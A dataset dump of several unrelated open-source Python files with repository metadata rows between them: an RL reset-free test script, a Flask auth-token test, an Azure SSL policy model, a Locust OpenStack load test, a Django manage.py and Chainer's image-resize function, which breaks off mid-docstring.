acc_bruise_mean = np.mean(acc_bruise_total)
acc_decay_mean = np.mean(acc_decay_total)
acc_contaminated_mean = np.mean(acc_contaminated_total)
auc_std = np.std(auc_total)
f1_std = np.std(f1_total)
acc_normal_std = np.std(acc_normal_total)
acc_bruise_std = np.std(acc_bruise_total)
acc_decay_std = np.std(acc_decay_total)
acc_contaminated_std = np.std(acc_contaminated_total)
print('auc',auc_total)
print('f1',f1_total)
print('acc_normal',acc_normal_total)
print('acc_bruise',acc_bruise_total)
print('acc_decay',acc_decay_total)
print('acc_contaminated',acc_contaminated_total)
csv_lines.append(['strawberry_10runs_mean', auc_mean, f1_mean, acc_normal_mean, acc_bruise_mean, acc_decay_mean,acc_contaminated_mean])
csv_lines.append(['strawberry_10runs_std', auc_std, f1_std, acc_normal_std, acc_bruise_std, acc_decay_std, acc_contaminated_std])
# save results
result_path = "{result}/{file_name}".format(result=param["result_directory"], file_name='result.csv')
com.logger.info("statistical results -> {}".format(result_path))
save_csv(save_file_path=result_path, save_data=csv_lines)
| 39.246246 | 200 | 0.660571 |
795baaca02700ea82e4b707300430dde6667d60e | 14,710 | py | Python | reset_free_learning/test_script.py | shaun95/google-research | d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5 | [
"Apache-2.0"
] | 1 | 2022-03-13T21:48:52.000Z | 2022-03-13T21:48:52.000Z | reset_free_learning/test_script.py | shaun95/google-research | d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5 | [
"Apache-2.0"
] | null | null | null | reset_free_learning/test_script.py | shaun95/google-research | d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5 | [
"Apache-2.0"
] | 1 | 2022-03-30T07:20:29.000Z | 2022-03-30T07:20:29.000Z | # coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test script."""
import os
import time
from gym.wrappers.monitor import Monitor # pylint: disable=unused-import
import numpy as np
import tensorflow as tf
from tf_agents.environments import tf_py_environment
from tf_agents.environments.suite_gym import wrap_env
from tf_agents.policies import random_tf_policy
from tf_agents.replay_buffers import tf_uniform_replay_buffer
from tf_agents.trajectories import trajectory
from tf_agents.utils import common, nest_utils # pylint: disable=g-multiple-import
from reset_free_learning.envs import kitchen
from reset_free_learning.envs import playpen
from reset_free_learning.envs import playpen_reduced
from reset_free_learning.envs import point_mass
from reset_free_learning.envs import point_mass_full_goal
from reset_free_learning.envs import pusher2d_simple
from reset_free_learning.envs import sawyer_door_close
from reset_free_learning.envs import sawyer_object
from reset_free_learning.reset_free_wrapper import GoalTerminalResetFreeWrapper # pylint: disable=unused-import
from reset_free_learning.reset_free_wrapper import GoalTerminalResetWrapper
from reset_free_learning.reset_free_wrapper import ResetFreeWrapper # pylint: disable=unused-import
def print_initial_state(step):
obs_strings = [str(step.observation[idx]) for idx in range(74 // 2)]
obs_to_string = '[' + ','.joing(obs_strings) + ']'
print(obs_to_string)
def get_env(name='sawyer_object', **env_kwargs):
if name == 'sawyer_object':
env = sawyer_object.SawyerObject( # pylint: disable=redefined-outer-name
random_init=True,
task_type='push',
obs_type='with_goal',
goal_low=(-0.1, 0.8, 0.05),
goal_high=(0.1, 0.9, 0.3),
liftThresh=0.04,
sampleMode='equal',
rewMode='orig',
rotMode='fixed')
env.set_camera_view(view='topview')
env.set_max_path_length(int(1e8))
if name == 'pusher2d_simple':
env = pusher2d_simple.PusherEnv()
if name == 'point_mass':
env = point_mass.PointMassEnv(**env_kwargs)
if name == 'point_mass_full_goal':
env = point_mass_full_goal.PointMassEnv(**env_kwargs)
if name == 'sawyer_door':
env = sawyer_door_close.SawyerDoor(random_init=True, obs_type='with_goal')
env.set_camera_view(view='topview')
env.set_max_path_length(int(1e8))
if name == 'kitchen':
env = kitchen.Kitchen()
if name == 'playpen':
env = playpen.ContinuousPlayPen(**env_kwargs)
if name == 'playpen_reduced':
env = playpen_reduced.ContinuousPlayPen(**env_kwargs)
return env
def copy_replay_buffer(small_buffer, big_buffer):
"""Copy small buffer into the big buffer."""
all_data = nest_utils.unbatch_nested_tensors(small_buffer.gather_all())
for trajectory in nest_utils.unstack_nested_tensors( # pylint: disable=redefined-outer-name
all_data, big_buffer.data_spec):
big_buffer.add_batch(trajectory)
def data_multiplier(offline_data, reward_fn): # pylint: disable=redefined-outer-name
"""Offline data multiplication."""
np.set_printoptions(precision=2, suppress=True)
def _custom_print(some_traj): # pylint: disable=unused-variable
np.set_printoptions(precision=2, suppress=True)
print('step', some_traj.step_type.numpy(), 'obs',
some_traj.observation.numpy(), 'action', some_traj.action.numpy(),
'reward', some_traj.reward.numpy(), 'next_step',
some_traj.next_step_type.numpy(), 'discount',
some_traj.discount.numpy())
all_data = nest_utils.unbatch_nested_tensors(offline_data.gather_all())
all_trajs = nest_utils.unstack_nested_tensors(all_data,
offline_data.data_spec)
for idx, traj in enumerate(all_trajs):
print('index:', idx)
if traj.step_type.numpy() == 0:
ep_start_idx = idx
print('\n\n\nnew start index:', ep_start_idx)
elif idx in [12, 24, 36, 48, 60, 72, 84, 96, 108]:
print('adding new trajectory')
obs_dim = traj.observation.shape[0] // 2
relabel_goal = traj.observation[:obs_dim]
print('new goal:', repr(relabel_goal.numpy()))
last_traj_idx = len(all_trajs[ep_start_idx:idx + 1])
for traj_idx, cur_trajectory in enumerate(all_trajs[ep_start_idx:idx +
1]):
if cur_trajectory.step_type.numpy() != 2:
new_obs = tf.concat(
[cur_trajectory.observation[:obs_dim], relabel_goal], axis=0)
next_obs = tf.concat([
all_trajs[ep_start_idx + traj_idx + 1].observation[:obs_dim],
relabel_goal
],
axis=0)
new_reward = tf.constant(reward_fn(obs=next_obs))
# terminate episode
if new_reward.numpy() > 0.0:
new_traj = cur_trajectory._replace(
observation=new_obs,
next_step_type=tf.constant(2),
reward=new_reward,
discount=tf.constant(0., dtype=tf.float32))
last_traj_idx = ep_start_idx + traj_idx + 1
# _custom_print(new_traj)
offline_data.add_batch(new_traj)
break
else:
new_traj = cur_trajectory._replace(
observation=new_obs,
reward=new_reward,
)
# _custom_print(new_traj)
offline_data.add_batch(new_traj)
last_observation = tf.concat(
[all_trajs[last_traj_idx].observation[:obs_dim], relabel_goal],
axis=0)
last_traj = cur_trajectory._replace( # pylint: disable=undefined-loop-variable
step_type=tf.constant(2),
observation=last_observation,
next_step_type=tf.constant(0),
reward=tf.constant(0.0),
discount=tf.constant(1., dtype=tf.float32))
# _custom_print(last_traj)
offline_data.add_batch(last_traj)
print('new size:', offline_data.num_frames())
if __name__ == '__main__':
max_episode_steps = 5000000
# env = get_env(name='point_mass_full_goal', env_type='y', reward_type='sparse')
# env = get_env(name='kitchen')
env = get_env(name='playpen_reduced', task_list='rc_o', reward_type='sparse')
base_dir = os.path.abspath('experiments/env_logs/playpen_reduced/symmetric/')
env_log_dir = os.path.join(base_dir, 'rc_o/traj1/')
# env = ResetFreeWrapper(env, reset_goal_frequency=500, full_reset_frequency=max_episode_steps)
env = GoalTerminalResetWrapper(
env,
episodes_before_full_reset=max_episode_steps // 500,
goal_reset_frequency=500)
# env = Monitor(env, env_log_dir, video_callable=lambda x: x % 1 == 0, force=True)
env = wrap_env(env)
tf_env = tf_py_environment.TFPyEnvironment(env)
tf_env.render = env.render
time_step_spec = tf_env.time_step_spec()
action_spec = tf_env.action_spec()
policy = random_tf_policy.RandomTFPolicy(
action_spec=action_spec, time_step_spec=time_step_spec)
collect_data_spec = trajectory.Trajectory(
step_type=time_step_spec.step_type,
observation=time_step_spec.observation,
action=action_spec,
policy_info=policy.info_spec,
next_step_type=time_step_spec.step_type,
reward=time_step_spec.reward,
discount=time_step_spec.discount)
offline_data = tf_uniform_replay_buffer.TFUniformReplayBuffer(
data_spec=collect_data_spec, batch_size=1, max_length=int(1e5))
rb_checkpointer = common.Checkpointer(
ckpt_dir=os.path.join(env_log_dir, 'replay_buffer'),
max_to_keep=10_000,
replay_buffer=offline_data)
rb_checkpointer.initialize_or_restore()
# replay buffer copy magic
do_a_copy = False
if do_a_copy:
buffer_list = [
os.path.join(base_dir, 'rc_o/combined/replay_buffer'),
os.path.join(base_dir, 'rc_k/combined/replay_buffer'),
os.path.join(base_dir, 'rc_p/combined/replay_buffer'),
os.path.join(base_dir, 'rc_b/combined/replay_buffer'),
]
for buffer_dir in buffer_list:
loaded_buffer = tf_uniform_replay_buffer.TFUniformReplayBuffer(
data_spec=collect_data_spec, batch_size=1, max_length=int(1e5))
cur_checkpointer = common.Checkpointer(
ckpt_dir=buffer_dir, max_to_keep=10_000, replay_buffer=loaded_buffer)
print(loaded_buffer.num_frames())
copy_replay_buffer(loaded_buffer, offline_data)
rb_checkpointer.save(global_step=0)
start_time = time.time()
# env.do_custom_reset(pos=np.array([0, 8, 1.57]))
time_step = tf_env.reset()
# print_initial_state(time_step)
# print(time_step.observation)
step_size = 0.5
command_to_action_map = {
'd': [step_size, 0],
'a': [-step_size, 0],
'w': [0, step_size],
's': [0, -step_size],
'x': [0, 0]
}
pick_drop_map = {'p': [1], 'l': [-1]}
print(offline_data.num_frames())
# data_multiplier(offline_data, tf_env.pyenv.envs[0].env.compute_reward)
# print(offline_data.num_frames())
# print(offline_data.gather_all())
# exit()
rb_checkpoint_idx = 0
for i in range(1, 2000):
tf_env.render(mode='human')
print(time_step)
action_step = policy.action(time_step)
# get action from user
command = input('action:')
if len(command) > 1:
action = np.concatenate(
[command_to_action_map[command[0]], pick_drop_map[command[1]]])
else:
action = np.concatenate([command_to_action_map[command[0]], [1]])
# add noise to action
action[:2] += np.random.uniform(low=-0.1, high=0.1, size=2)
action_step = action_step._replace(
action=tf.constant([action], dtype=tf.float32))
next_time_step = tf_env.step(action_step.action)
print('reward:', next_time_step.reward)
offline_data.add_batch(
trajectory.from_transition(time_step, action_step, next_time_step))
if next_time_step.is_last():
# print(i, env.get_info())
time_step = next_time_step
print('last step:', time_step)
next_time_step = tf_env.step(action_step.action) # dummy action for reset
offline_data.add_batch(
trajectory.from_transition(time_step, action_step, next_time_step))
command = input('save offline data?')
if command == 'y':
print('saving data')
rb_checkpointer.save(global_step=rb_checkpoint_idx)
rb_checkpoint_idx += 1
elif command == 'c':
print('clearing data')
offline_data.clear()
else:
print('not saving data')
time_step = next_time_step
print('time:', time.time() - start_time)
# dummy stuff to store plotting code
else:
import tensorflow as tf # tf # pylint: disable=g-import-not-at-top
import matplotlib # pylint: disable=g-import-not-at-top, unused-import
import matplotlib.pyplot as plt # pylint: disable=g-import-not-at-top
import matplotlib.cm as cm # pylint: disable=g-import-not-at-top, unused-import
import numpy as np # pylint: disable=g-import-not-at-top, reimported
import seaborn as sns # pylint: disable=g-import-not-at-top, unused-import
import re # pylint: disable=g-import-not-at-top, unused-import
import pickle as pkl # pylint: disable=g-import-not-at-top, unused-import
import os # pylint: disable=g-import-not-at-top, reimported
max_index = int(1e7)
def smooth(x, alpha):
if isinstance(x, list):
size = len(x)
else:
size = x.shape[0]
for idx in range(1, size):
x[idx] = (1 - alpha) * x[idx] + alpha * x[idx - 1]
return x
def make_graph_with_variance(vals, x_interval):
data_x = []
data_y = []
global max_index
for y_coords, eval_interval in zip(vals, x_interval):
data_y.append(smooth(y_coords, 0.95))
x_coords = [eval_interval * idx for idx in range(len(y_coords))]
data_x.append(x_coords)
plot_dict = {}
cur_max_index = max_index
# for cur_x, cur_y in zip(data_x, data_y):
# cur_max_index = min(cur_max_index, cur_x[-1])
# print(cur_max_index)
for cur_x, cur_y in zip(data_x, data_y):
for x, y in zip(cur_x, cur_y):
if x <= cur_max_index:
if x in plot_dict.keys():
plot_dict[x].append(y)
else:
plot_dict[x] = [y]
index, means, stds = [], [], []
for key in sorted(plot_dict.keys()): # pylint: disable=g-builtin-op
index.append(key)
means.append(np.mean(plot_dict[key]))
stds.append(np.std(plot_dict[key]))
means = np.array(smooth(means, 0.9))
stds = np.array(smooth(stds, 0.8))
return index, means, stds
def np_custom_load(fname):
with tf.gfile.Open(fname, 'rb') as f:
load_file = np.load(f).astype(np.float32)
return load_file
color_map = ['b', 'g', 'r', 'c', 'm', 'y', 'k']
style_map = []
for line_style in ['-', '--', '-.', ':']:
style_map += [color + line_style for color in color_map]
def plot_call(job_id,
worker_ids,
legend_label,
plot_style,
file_path,
y_plot='return'):
"""Outermost function for plotting graphs with variance."""
print(worker_ids)
job_id = str(job_id)
if y_plot == 'return':
y_coords = [
np_custom_load(file_path + # pylint: disable=g-complex-comprehension
job_id + '/' + worker_id +
'/eval/average_eval_return.npy')
for worker_id in worker_ids
]
elif y_plot == 'success':
y_coords = [
np_custom_load(file_path + # pylint: disable=g-complex-comprehension
job_id + '/' + worker_id +
'/eval/average_eval_success.npy')
for worker_id in worker_ids
]
eval_interval = [
np_custom_load('/home/architsh/brain/reset_free/reset_free/' + job_id +
'/' + worker_id + '/eval/eval_interval.npy')
for worker_id in worker_ids
]
index, means, stds = make_graph_with_variance(y_coords, eval_interval)
plt.plot(index, means, plot_style, label=legend_label)
cur_color = plot_style[0]
plt.fill_between(
index, means - stds, means + stds, color=cur_color, alpha=0.2)
| 37.052897 | 112 | 0.67172 |
795bacfa292b1dee9719810769b1e01c205fd2c3 | 1,456 | py | Python | tests/test_user.py | rukaury/ePlannerAPI | 8f9dad6f6716670d23ec8087ad07504a39f7564d | [
"MIT"
] | null | null | null | tests/test_user.py | rukaury/ePlannerAPI | 8f9dad6f6716670d23ec8087ad07504a39f7564d | [
"MIT"
] | null | null | null | tests/test_user.py | rukaury/ePlannerAPI | 8f9dad6f6716670d23ec8087ad07504a39f7564d | [
"MIT"
] | null | null | null | from app import db
from tests.base import BaseTestCase
from app.models.users import User
import unittest
class TestUserModel(BaseTestCase):
"""
Test that the auth token is generated correctly
"""
def test_encode_user_token(self):
"""
Test that a user token is generated correctly
:return:
"""
user = self.create_and_save_user()
auth_token = self.get_auth_token(user)
self.assertTrue(isinstance(auth_token, bytes))
def test_decode_user_token(self):
"""
Test that the user auth token is decoded and that its valid
:return:
"""
user = self.create_and_save_user()
auth_token = self.get_auth_token(user)
self.assertTrue(isinstance(auth_token, bytes))
self.assertTrue(user.decode_auth_token(auth_token.decode('utf-8')) == 1, msg='The user Id should be 1')
def create_and_save_user(self):
"""
Helper method to create and save a user in the database
:return:
"""
user = User(email='example@gmail.com', password='123456')
db.session.add(user)
db.session.commit()
return user
def get_auth_token(self, user):
"""
Helper method to decode a user auth token
:param user:
:return:
"""
auth_token = user.encode_auth_token(user.id)
return auth_token
if __name__ == '__main__':
unittest.main()
| 27.471698 | 111 | 0.62294 |
795badd2ff1e68eea64f9f3e142efb3bc38f5f94 | 1,830 | py | Python | azure-mgmt-network/azure/mgmt/network/v2018_12_01/models/application_gateway_ssl_predefined_policy.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | [
"MIT"
] | 1 | 2021-09-07T18:36:04.000Z | 2021-09-07T18:36:04.000Z | azure-mgmt-network/azure/mgmt/network/v2018_12_01/models/application_gateway_ssl_predefined_policy.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | [
"MIT"
] | 2 | 2019-10-02T23:37:38.000Z | 2020-10-02T01:17:31.000Z | azure-mgmt-network/azure/mgmt/network/v2018_12_01/models/application_gateway_ssl_predefined_policy.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | [
"MIT"
] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .sub_resource import SubResource
class ApplicationGatewaySslPredefinedPolicy(SubResource):
"""An Ssl predefined policy.
:param id: Resource ID.
:type id: str
:param name: Name of the Ssl predefined policy.
:type name: str
:param cipher_suites: Ssl cipher suites to be enabled in the specified
order for application gateway.
:type cipher_suites: list[str or
~azure.mgmt.network.v2018_12_01.models.ApplicationGatewaySslCipherSuite]
:param min_protocol_version: Minimum version of Ssl protocol to be
supported on application gateway. Possible values include: 'TLSv1_0',
'TLSv1_1', 'TLSv1_2'
:type min_protocol_version: str or
~azure.mgmt.network.v2018_12_01.models.ApplicationGatewaySslProtocol
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'cipher_suites': {'key': 'properties.cipherSuites', 'type': '[str]'},
'min_protocol_version': {'key': 'properties.minProtocolVersion', 'type': 'str'},
}
def __init__(self, **kwargs):
super(ApplicationGatewaySslPredefinedPolicy, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
self.cipher_suites = kwargs.get('cipher_suites', None)
self.min_protocol_version = kwargs.get('min_protocol_version', None)
| 40.666667 | 88 | 0.642077 |
795bae0052082720624a682405ae7a4f25513b75 | 2,195 | py | Python | rannsaka/locust_files/task_sets/basic_get.py | pcrews/rannsaka | 4bd86e86eb31c18e9ec0cbbc7926f8f3d4063e26 | [
"Apache-2.0"
] | 2 | 2015-11-11T16:14:17.000Z | 2019-01-13T05:02:51.000Z | rannsaka/locust_files/task_sets/basic_get.py | pcrews/rannsaka | 4bd86e86eb31c18e9ec0cbbc7926f8f3d4063e26 | [
"Apache-2.0"
] | null | null | null | rannsaka/locust_files/task_sets/basic_get.py | pcrews/rannsaka | 4bd86e86eb31c18e9ec0cbbc7926f8f3d4063e26 | [
"Apache-2.0"
] | null | null | null | if __name__ == "__main__" and __package__ is None:
__package__ = "task_sets.nova_basic_task_set"
import os
import random
import time
import json
from locust import HttpLocust, TaskSet, task
from baseTaskSet import baseTaskSet
import task_funcs.keystone_v2_base as keystone_base
import task_funcs.nova_v2_base as nova_base
import task_funcs.nova_v2_utility as nova_util
class basicGet(baseTaskSet):
""" task set designed to do insane, random, and valid things
via the nova api
"""
def on_start(self):
super(basicGet, self).on_start()
self.server_count = 0
# Use admin pw to create test flavors
self.keystone_user = self.get_tempest_config_value('identity', 'admin_username')
self.keystone_pw = self.get_tempest_config_value('identity', 'admin_password')
self.keystone_tenant = self.get_tempest_config_value('identity', 'admin_tenant_name')
self.auth_token, self.tenant_id, self.service_catalog = keystone_base.get_auth_token(self)
nova_base.create_flavor(self, name='test1',
ram=4096,
vcpus=2,
disk=0,
id=9999,
is_public=True)
nova_base.create_flavor(self, name='test2',
ram=2048,
vcpus=2,
disk=0,
id=9998,
is_public=True)
# reset to 'main' test user
self.keystone_user = self.get_tempest_config_value('identity','username')
self.keystone_tenant = self.get_tempest_config_value('identity','tenant_name')
self.keystone_pw = self.get_tempest_config_value('identity','password')
self.auth_token, self.tenant_id, self.service_catalog = keystone_base.get_auth_token(self)
tasks = { nova_base.list_servers: 1,
nova_base.list_servers_detail: 1,
nova_base.list_flavors: 1,
nova_base.list_images: 1,
nova_base.list_images_detail: 1,
nova_base.list_image_detail: 1,
nova_base.list_image_metadata: 1,
nova_base.list_limits: 1
}
| 37.20339 | 98 | 0.634624 |
795bae458b30b6afef21de4895095801b46687e3 | 544 | py | Python | manage.py | Miguelrom/EasyApproval | 14bc48086ca20a2830d0ff17961a7cec84ea42bc | [
"Apache-2.0"
] | null | null | null | manage.py | Miguelrom/EasyApproval | 14bc48086ca20a2830d0ff17961a7cec84ea42bc | [
"Apache-2.0"
] | 3 | 2019-12-03T22:36:30.000Z | 2019-12-12T01:27:34.000Z | manage.py | Miguelrom/EasyApproval | 14bc48086ca20a2830d0ff17961a7cec84ea42bc | [
"Apache-2.0"
] | 12 | 2019-12-03T22:36:12.000Z | 2019-12-12T05:52:15.000Z | #!/usr/bin/env python
import os
import sys
if __name__ == '__main__':
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'EasyApproval.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| 34 | 76 | 0.689338 |
795baf163b123836e69f2e9a67e51f256adfd230 | 184 | py | Python | counterblock/__init__.py | coinwarp/dogeblock | fc4a3a8315e1e822c1261f0fbcb4e1bbd300dfcd | [
"MIT"
] | null | null | null | counterblock/__init__.py | coinwarp/dogeblock | fc4a3a8315e1e822c1261f0fbcb4e1bbd300dfcd | [
"MIT"
] | null | null | null | counterblock/__init__.py | coinwarp/dogeblock | fc4a3a8315e1e822c1261f0fbcb4e1bbd300dfcd | [
"MIT"
] | null | null | null | import os, sys
def server_main():
from counterblock import server
server.main()
def armory_utxsvr_main():
from counterblock import armory_utxsvr
armory_utxsvr.main()
| 18.4 | 42 | 0.73913 |
795baf6a1f4e38cd98c20021e0b6d3b3b1a7b6f8 | 9,500 | py | Python | chainer/functions/array/resize_images.py | chemshi/chainer | ff322e0a87b0a9e3dc3d49f62ce2f3cb6dc19cc9 | [
"MIT"
] | 1 | 2019-04-09T04:55:06.000Z | 2019-04-09T04:55:06.000Z | chainer/functions/array/resize_images.py | chemshi/chainer | ff322e0a87b0a9e3dc3d49f62ce2f3cb6dc19cc9 | [
"MIT"
] | null | null | null | chainer/functions/array/resize_images.py | chemshi/chainer | ff322e0a87b0a9e3dc3d49f62ce2f3cb6dc19cc9 | [
"MIT"
] | null | null | null | import numpy
from chainer import backend
from chainer.backends import cuda
from chainer import function_node
from chainer.utils import type_check
def _infer_lines(B, C, H, W, out_H, out_W, kH, kW):
target_size = 2 ** 17
line_size = B * C * (H * W // out_H + kH * kW * out_W)
target_lines = target_size // line_size
if target_lines < out_H:
lines = 1
while True:
next_lines = lines * 2
if next_lines > target_lines:
break
lines = next_lines
else:
lines = out_H
return lines
def interpolate_bilinear_cpu(x, v, u, vw, uw):
B, C, H, W = x.shape
out_H, out_W = v.shape
# Interpolation is done by each output panel (i.e. multi lines)
# in order to better utilize CPU cache memory.
lines = _infer_lines(B, C, H, W, out_H, out_W, 2, 2)
vcol = numpy.empty((2, lines, out_W), dtype=v.dtype)
ucol = numpy.empty((2, lines, out_W), dtype=u.dtype)
wcol = numpy.empty((2, 2, lines, out_W), dtype=x.dtype)
y = numpy.empty((B * C, out_H * out_W), dtype=x.dtype)
for i in range(0, out_H, lines):
l = min(lines, out_H - i)
vcol = vcol[:, :l]
ucol = ucol[:, :l]
wcol = wcol[:, :, :l]
i_end = i + l
# indices
vcol[0] = v[i:i_end]
ucol[0] = u[i:i_end]
numpy.add(vcol[0], 1, out=vcol[1])
numpy.add(ucol[0], 1, out=ucol[1])
numpy.minimum(vcol[1], H - 1, out=vcol[1])
numpy.minimum(ucol[1], W - 1, out=ucol[1])
# weights
# wcol[0, 0] = (1 - uw) * (1 - vw)
# wcol[0, 1] = uw * (1 - vw)
# wcol[1, 0] = (1 - uw) * vw
# wcol[1, 1] = uw * vw
wcol[0, 1] = uw[i:i_end]
numpy.subtract(1, wcol[0, 1], out=wcol[0, 0])
numpy.multiply(wcol[0], vw[i:i_end], out=wcol[1])
wcol[0] -= wcol[1]
# packing to the panel whose shape is (B, C, 2, 2, l, out_W)
panel = x[:, :, vcol[:, None], ucol[None, :]]
# interpolation
panel = panel.reshape((B * C, 4, l * out_W))
weights = wcol.reshape((4, l * out_W))
iout = i * out_W
iout_end = i_end * out_W
numpy.einsum('ijk,jk->ik', panel, weights, out=y[:, iout:iout_end])
del panel, weights
return y.reshape((B, C, out_H, out_W))
def interpolate_bilinear_gpu(x, v, u, vw, uw):
B, C, H, W = x.shape
out_H, out_W = v.shape
y = cuda.cupy.empty((B, C, out_H, out_W), dtype=x.dtype)
cuda.elementwise(
'raw T x, S v, S u, T vw, T uw, S H, S W, S outsize', 'T y', '''
// indices
S v0 = v;
S v1 = min(v + 1, (S)(H - 1));
S u0 = u;
S u1 = min(u + 1, (S)(W - 1));
// weights
T w0 = (1 - vw) * (1 - uw);
T w1 = (1 - vw) * uw;
T w2 = vw * (1 - uw);
T w3 = vw * uw;
// fetch
S offset = i / outsize * H * W;
T px0 = x[offset + v0 * W + u0];
T px1 = x[offset + v0 * W + u1];
T px2 = x[offset + v1 * W + u0];
T px3 = x[offset + v1 * W + u1];
// interpolate
y = (w0 * px0 + w1 * px1) + (w2 * px2 + w3 * px3);
''', 'resize_images_interpolate_bilinear'
)(x, v, u, vw, uw, H, W, out_H * out_W, y)
return y
def interpolate_grad_bilinear_cpu(gy, v, u, vw, uw, H, W):
B, C, out_H, out_W = gy.shape
# indices
vcol = numpy.empty((2, out_H, out_W), dtype=v.dtype)
ucol = numpy.empty((2, out_H, out_W), dtype=u.dtype)
vcol[0] = v
ucol[0] = u
numpy.add(vcol[0], 1, out=vcol[1])
numpy.add(ucol[0], 1, out=ucol[1])
numpy.minimum(vcol[1], H - 1, out=vcol[1])
numpy.minimum(ucol[1], W - 1, out=ucol[1])
# weights
wcol = numpy.empty((2, 2, out_H, out_W), dtype=gy.dtype)
wcol[0, 1] = uw
numpy.subtract(1, wcol[0, 1], out=wcol[0, 0])
numpy.multiply(wcol[0], vw, out=wcol[1])
wcol[0] -= wcol[1]
# grad
gycol = gy.reshape((B * C, 1, 1, out_H, out_W)) * wcol
# ravel everything and use `bincount`
indices = (vcol[:, None] * W + ucol[None, :]).ravel()
offsets = numpy.arange(0, B * C * H * W, H * W, dtype=v.dtype)
indices = (offsets[:, None] + indices).ravel()
gx = numpy.bincount(indices, weights=gycol.ravel(),
minlength=(B * C * H * W))
gx = gx.astype(gy.dtype, copy=False)
return gx.reshape((B, C, H, W))
def interpolate_grad_bilinear_gpu(gy, v, u, vw, uw, H, W):
B, C, out_H, out_W = gy.shape
gx = cuda.cupy.zeros((B * C, H, W), dtype=gy.dtype)
cuda.elementwise(
'T gy, S v, S u, T vw, T uw, S H, S W, S outsize', 'raw T gx', '''
// indices
S v0 = v;
S v1 = min(v + 1, (S)(H - 1));
S u0 = u;
S u1 = min(u + 1, (S)(W - 1));
// weights
T w0 = (1 - vw) * (1 - uw);
T w1 = (1 - vw) * uw;
T w2 = vw * (1 - uw);
T w3 = vw * uw;
// scatter
S offset = i / outsize * H * W;
atomicAdd(&gx[offset + v0 * W + u0], w0 * gy);
atomicAdd(&gx[offset + v0 * W + u1], w1 * gy);
atomicAdd(&gx[offset + v1 * W + u0], w2 * gy);
atomicAdd(&gx[offset + v1 * W + u1], w3 * gy);
''', 'resize_images_interpolate_grad_bilinear'
)(gy, v, u, vw, uw, H, W, out_H * out_W, gx)
return gx.reshape((B, C, H, W))
class ResizeImages(function_node.FunctionNode):
def __init__(self, output_shape):
self.out_H = output_shape[0]
self.out_W = output_shape[1]
def check_type_forward(self, in_types):
type_check._argname(in_types, ('x',))
x_type = in_types[0]
type_check.expect(
x_type.dtype == numpy.float32,
x_type.ndim == 4
)
def forward(self, inputs):
x, = inputs
xp = backend.get_array_module(x)
_, C, H, W = x.shape
out_H, out_W = self.out_H, self.out_W
# Compute indices and weights.
v = xp.linspace(0, H - 1, num=out_H, dtype=numpy.float)
u = xp.linspace(0, W - 1, num=out_W, dtype=numpy.float)
vw, v = xp.modf(v)
uw, u = xp.modf(u)
v = v.astype(numpy.intp)
u = u.astype(numpy.intp)
vw = vw.astype(x.dtype)
uw = uw.astype(x.dtype)
# Meshgrid-like operation. Meshgrid can cause
# performance loss due to memory consumption.
# Note that numpy 1.9 doesn't support broadcast_to method.
v, u, vw, uw = xp.broadcast_arrays(
v[:, None], u[None, :], vw[:, None], uw[None, :])
if xp is numpy:
y = interpolate_bilinear_cpu(x, v, u, vw, uw)
else:
y = interpolate_bilinear_gpu(x, v, u, vw, uw)
return y,
def backward(self, indexes, grad_outputs):
return ResizeImagesGrad(
self.inputs[0].shape, (self.out_H, self.out_W)).apply(grad_outputs)
class ResizeImagesGrad(function_node.FunctionNode):
def __init__(self, input_shape, output_shape):
self.out_H = output_shape[0]
self.out_W = output_shape[1]
self.input_shape = input_shape
def check_type_forward(self, in_types):
type_check._argname(in_types, ('gy',))
gy_type = in_types[0]
type_check.expect(
gy_type.dtype == numpy.float32,
gy_type.ndim == 4
)
def forward(self, inputs):
gy, = inputs
xp = backend.get_array_module(gy)
_, C, H, W = self.input_shape
out_H, out_W = self.out_H, self.out_W
# Compute indices and weights.
v = xp.linspace(0, H - 1, num=out_H, dtype=numpy.float)
u = xp.linspace(0, W - 1, num=out_W, dtype=numpy.float)
vw, v = xp.modf(v)
uw, u = xp.modf(u)
v = v.astype(numpy.intp)
u = u.astype(numpy.intp)
vw = vw.astype(gy.dtype)
uw = uw.astype(gy.dtype)
# Meshgrid-like operation. Meshgrid can cause
# performance loss due to memory consumption.
# Note that numpy 1.9 doesn't support broadcast_to method.
v, u, vw, uw = xp.broadcast_arrays(
v[:, None], u[None, :], vw[:, None], uw[None, :])
if xp is numpy:
gx = interpolate_grad_bilinear_cpu(gy, v, u, vw, uw, H, W)
else:
gx = interpolate_grad_bilinear_gpu(gy, v, u, vw, uw, H, W)
return gx,
def backward(self, indexes, grad_outputs):
return ResizeImages((self.out_H, self.out_W)).apply(grad_outputs)
def resize_images(x, output_shape):
"""Resize images to the given shape.
This function resizes 2D data to :obj:`output_shape`.
Currently, only bilinear interpolation is supported as the sampling method.
Notatition: here is a notation for dimensionalities.
- :math:`n` is the batch size.
- :math:`c_I` is the number of the input channels.
- :math:`h` and :math:`w` are the height and width of the input image,
respectively.
